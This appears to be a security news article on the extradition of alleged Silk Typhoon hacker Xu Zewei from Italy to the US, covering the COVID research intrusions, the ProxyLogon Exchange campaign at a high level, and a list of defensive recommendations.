A Chinese national accused of working as a contract hacker for China's Ministry of State Security has been extradited from Italy to the United States, where he faces federal charges tied to a years-long cyberespionage campaign attributed to the Silk Typhoon group. According to the Department of Justice, Xu Zewei conducted intrusions between February 2020 and June 2021, including attacks on COVID-19 research organizations and the mass exploitation of Microsoft Exchange Server zero-days that compromised thousands of organizations worldwide.

What Happened

Xu Zewei was arrested in Milan in 2025 at the request of U.S. authorities and has now been transferred to American custody to face multiple counts related to computer intrusions and conspiracy. Prosecutors allege Xu operated under the direction of officers from the MSS Shanghai State Security Bureau (SSSB) while employed at Shanghai Powerock Network Co., Ltd., a private firm the DOJ describes as one of many contractor shells used to launder Chinese state-sponsored hacking operations. The indictment links Xu directly to activity attributed to Silk Typhoon, also tracked as Hafnium, the Chinese state-aligned cluster responsible for some of the most consequential intrusions of the past five years.

What Was Taken

The DOJ alleges Xu and his co-conspirators targeted U.S. universities and research institutions working on COVID-19 vaccines, treatments, and testing, exfiltrating sensitive biomedical research data during the early pandemic. Separately, the 2021 Exchange Server campaign tied to the same actors enabled mass theft of corporate and government email, contact databases, and internal correspondence from victim mailboxes. Once inside networks, the attackers performed reconnaissance, deployed malware, and staged data for exfiltration, with thousands of organizations globally caught in the wider Hafnium sweep.

Why It Matters

This extradition is one of the few times a named operator inside a Chinese state-aligned hacking program has been brought into a U.S. courtroom, and the unsealed allegations confirm publicly what threat researchers have long asserted: that the MSS contracts intrusion work to nominally private Chinese firms like Powerock, providing a layer of plausible deniability while still directing targeting and tasking. For defenders, the case crystallizes the operational model behind Silk Typhoon and similar clusters, where commercial hacking contractors execute campaigns aligned with PRC intelligence priorities ranging from public health research to enterprise email compromise. It also signals continued willingness by Western governments to pursue extraditions of Chinese contractors caught traveling abroad.

The Attack Technique

Silk Typhoon's tradecraft during the indicted window centered on opportunistic exploitation of internet-facing systems, most notoriously the chain of Microsoft Exchange zero-days disclosed in March 2021 (ProxyLogon and related flaws). After breaching vulnerable Exchange servers, the operators deployed web shells that gave persistent access to mailboxes, enabled lateral movement, and supported bulk data exfiltration. The campaign accelerated dramatically once the vulnerabilities became known, with the actors racing to compromise as many servers as possible before patches reached defenders. Earlier 2020 intrusions against COVID-19 research targets relied on similar perimeter exploitation followed by reconnaissance and malware deployment inside victim networks.

What Organizations Should Do

  1. Audit all internet-facing Exchange, Citrix, Ivanti, and similar appliances for unpatched vulnerabilities and known Silk Typhoon/Hafnium IOCs, including legacy web shells that may have persisted since 2021.
  2. Hunt retrospectively for China Chopper, Awen, and other web shells associated with the ProxyLogon campaign in archived web server logs and unmonitored DMZ hosts.
  3. Apply strict egress filtering and TLS inspection on perimeter systems to detect data staging and exfiltration to attacker-controlled infrastructure.
  4. Treat biomedical, pharmaceutical, and dual-use research environments as priority targets and segregate them from general enterprise networks with dedicated monitoring.
  5. Map MSS-aligned contractor TTPs (Silk Typhoon, Volt Typhoon, Salt Typhoon) into detection engineering backlogs, prioritizing initial-access exploitation of edge devices over endpoint-only coverage.
  6. Review incident response retainers and legal escalation paths for handling state-sponsored intrusions, including coordination with FBI field offices and CISA.

Sources: Alleged Silk Typhoon hacker extradited to US for cyberespionage